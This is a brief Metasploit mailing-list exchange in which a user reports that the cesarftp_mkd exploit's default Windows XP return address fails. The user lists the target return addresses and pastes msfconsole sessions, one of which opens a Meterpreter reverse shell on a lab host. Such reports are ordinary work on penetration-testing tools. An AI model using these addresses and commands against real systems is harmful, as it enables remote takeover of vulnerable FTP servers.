Re: cesarftp_mkd default target XP SP2/SP3 doesn't work

[MC <mc () metasploit com>]

Thanks! Will update the target set soon.

~mc

On Mon, 22 Feb 2010, One Time wrote:

> In the cesarftp_mkd module default targets are:
>
> [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
> [ 'Windows 2000 Pro SP4 French',  { 'Ret' => 0x775F29D0 } ],
> [ 'Windows XP SP2/SP3 English',       { 'Ret' => 0x774699bf } ], # jmp esp,
> user32.dll
> #[ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp esp,
> winmm.dll
> #[ 'Windows XP SP3 English',       { 'Ret' => 0x76b43adc } ], # jmp esp,
> winmm.dll
> [ 'Windows 2003 SP1 English',     { 'Ret' => 0x76AA679b } ],
>
> The exploit works only If I enable the commented out target: "#[ 'Windows XP
> SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll"
>
> ---
>
> The following is the result of a test run against Windows XP SP2 (English)
> with svn r8585 (2010.02.22) and target [ 'Windows XP SP2/SP3 English',      
> { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll:
>
> msf > use exploit/windows/ftp/cesarftp_mkd
> msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
> PAYLOAD => windows/meterpreter/reverse_ord_tcp
> msf exploit(cesarftp_mkd) > set TARGET 2
> TARGET => 2
> msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131
> LHOST => 192.168.159.131
> msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134
> RHOST => 192.168.159.134
> msf exploit(cesarftp_mkd) > exploit
>
> [*] Started reverse handler on 192.168.159.131:4444
> [*] Connecting to FTP server 192.168.159.134:21...
> [*] Connected to target FTP server.
> [*] Authenticating as anonymous with password mozilla () example com...
> [*] Sending password...
> [*] Trying target Windows XP SP2/SP3 English...
> [*] Exploit completed, but no session was created.
> msf exploit(cesarftp_mkd) >
>
> --
>
> The following is the result of a test run against Windows XP SP2 (English)
> with svn r8585 (2010.02.22) and target [ 'Windows XP SP2 English',       {
> 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll:
>
> msf > use exploit/windows/ftp/cesarftp_mkd
> msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
> PAYLOAD => windows/meterpreter/reverse_ord_tcp
> msf exploit(cesarftp_mkd) > set TARGET 3
> TARGET => 3
> msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131
> LHOST => 192.168.159.131
> msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134
> RHOST => 192.168.159.134
> msf exploit(cesarftp_mkd) > exploit
>
> [*] Started reverse handler on 192.168.159.131:4444
> [*] Connecting to FTP server 192.168.159.134:21...
> [*] Connected to target FTP server.
> [*] Authenticating as anonymous with password mozilla () example com...
> [*] Sending password...
> [*] Trying target Windows XP SP2 English...
> [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
> [*] Sending stage (747008 bytes)
> [*] Meterpreter session 1 opened (192.168.159.131:4444 ->
> 192.168.159.134:1026)
>
> meterpreter >
>
> --
>
> Regards.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework